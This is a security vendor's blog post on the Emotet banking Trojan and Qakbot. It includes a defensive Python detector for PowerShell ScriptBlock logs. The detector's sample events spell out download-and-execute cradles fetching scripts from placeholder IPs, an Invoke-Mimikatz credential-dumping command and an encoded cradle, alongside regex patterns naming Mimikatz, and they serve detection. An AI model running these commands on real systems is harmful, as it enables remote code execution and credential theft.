Si Cyber Intel:  Emotet – The Rise Of Banking Trojans
Aug 2018

Back in June, Symantec published research on the activities of the threat group it tracks as Mealybug. The group, first identified in 2014, built and operated the malware named 'Emotet', originally a banking Trojan that stole online banking credentials from users based in Europe. Once inside a network, Emotet can self-propagate, allowing it to spread aggressively from host to host.

Since then Mealybug's activity has evolved: rather than maintaining and delivering only its own banking Trojan, the group now offers Emotet to other threat actors as a distribution service, taking a cut of their earnings. Emotet is delivered via phishing emails; once installed, it can steal private information, download further payloads from its command-and-control server and execute them.

The most recent version of Emotet adds several new modules:

  • an email client module that steals email account credentials
  • banking modules that steal the user's online banking information
  • a browser infostealer module that harvests browsing history and saved passwords
  • a PST infostealer module that reads Microsoft Outlook message archives (.pst files) to harvest email addresses and message data
  • a DDoS attack module

Emotet is also used to distribute Qakbot, a related banking Trojan that behaves like a worm. Qakbot uses a Windows PowerShell script to download Mimikatz, the increasingly popular open-source credential-dumping tool, and runs it to harvest credentials from the infected host, which it then uses to spread further.
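
The PowerShell download-and-execute behaviour described above (a script that fetches a tool such as Mimikatz and runs it) is something a defender can look for in PowerShell ScriptBlock logging (Event ID 4104). The following Python snippet is an added example for this article, not code from Symantec or from the original post: it scores constructed sample ScriptBlockText lines against indicators of download cradles, in-memory execution, evasion flags, credential tooling and base64-encoded commands, and decodes -EncodedCommand payloads so that encoding does not hide the cradle. The indicator names, weights, threshold and sample lines are this example's own assumptions.

```python
"""Flag PowerShell download-and-execute activity in ScriptBlock log lines.

Added example for this article; indicator names, weights and samples are
this example's own, not taken from the article or from Symantec.
"""
import base64
import re
from typing import List, NamedTuple

# An -EncodedCommand argument is base64 of UTF-16LE text; decode it so the
# same indicators can be applied to what actually runs.
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# (name, pattern, weight). Weights are illustrative assumptions.
INDICATORS = [
    ("download_cradle", re.compile(
        r"Net\.WebClient|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|DownloadString|DownloadFile", re.I), 2),
    ("in_memory_exec", re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("evasion_flags", re.compile(
        r"-nop\b|-NoProfile\b|-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass", re.I), 1),
    ("credential_tool", re.compile(r"mimikatz|sekurlsa", re.I), 3),
    ("encoded_command", ENCODED_RE, 1),
]
ALERT_THRESHOLD = 3  # a cradle alone scores 2; cradle + IEX, or any Mimikatz reference, alerts


class Finding(NamedTuple):
    line: str
    indicators: List[str]
    score: int
    decoded: str  # decoded -EncodedCommand payload, if any


def decode_encoded_command(line: str) -> str:
    """Return the decoded -EncodedCommand payload in `line`, or '' if none or invalid."""
    m = ENCODED_RE.search(line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return ""


def score_line(line: str) -> Finding:
    """Score one ScriptBlockText line, scanning the raw text plus any decoded payload."""
    decoded = decode_encoded_command(line)
    text = line + "\n" + decoded
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return Finding(line, hits, score, decoded)


def find_suspicious(lines, threshold: int = ALERT_THRESHOLD) -> List[Finding]:
    """Return findings whose score meets the threshold, in input order."""
    return [f for f in map(score_line, lines) if f.score >= threshold]


# Constructed sample events modelled on Event ID 4104 ScriptBlockText; not real captures.
ENCODED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')"
ENCODED_ARG = base64.b64encode(ENCODED_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    r"4104 ScriptBlockText: Get-ChildItem C:\Users\alice\Documents",
    "4104 ScriptBlockText: powershell -nop -w hidden -ep bypass "
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/m.ps1')",
    r"4104 ScriptBlockText: powershell -NoProfile -File C:\scripts\nightly-backup.ps1",
    "4104 ScriptBlockText: IEX (New-Object Net.WebClient).DownloadString("
    "'http://198.51.100.7/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds",
    f"4104 ScriptBlockText: powershell -EncodedCommand {ENCODED_ARG}",
    "4104 ScriptBlockText: Get-Service | Where-Object {$_.Status -eq 'Running'}",
]

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f"score={f.score} {f.indicators}: {f.line[:70]}")
        if f.decoded:
            print(f"  decoded: {f.decoded}")
```

Run directly, it prints the three flagged lines: the plain download cradle, the Mimikatz fetch, and the encoded command, which alerts only because its decoded payload is scanned. The benign `-NoProfile` backup script is scored but stays below the threshold. In production the same logic belongs in a SIEM rule tuned against the organisation's own legitimate PowerShell usage, and Script Block Logging must first be enabled through the 'Turn on PowerShell Script Block Logging' Group Policy setting so that Event ID 4104 is written at all.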

How to protect yourself:

Banking Trojans are on the rise, with new variants uncovered daily. To avoid becoming a victim, we recommend the following:

  • Enable two-factor authentication (2FA) wherever it is offered, especially on online banking and email accounts. This form of multi-factor authentication requires not only a username and password (something you know) but also a second factor such as a one-time code from an authenticator app or a hardware token (something you have), so a password stolen by a banking Trojan is not enough on its own to log in
  • Make sure internet routers at home and in the office are updated with recent patches and security updates
  • Verify that websites you are redirected to use HTTPS and present a valid certificate issued by a trusted certificate authority before entering any credentials
  • Treat unexpected email attachments and links with suspicion, since Emotet itself arrives by phishing email; never enable macros in a document simply because it asks you to
  • Avoid installing mobile applications from unknown sources. By default, Android prevents users from installing apps from sources other than the Play Store. We recommend that you leave the installation of apps from unknown sources disabled
  • Avoid opening links received by SMS, WhatsApp or other messaging applications from unknown senders
  • Avoid downloading third-party applications or responding to suspicious messages

For information about Si Cyber’s malware detection and response capabilities, please contact sales@siconsult.com 
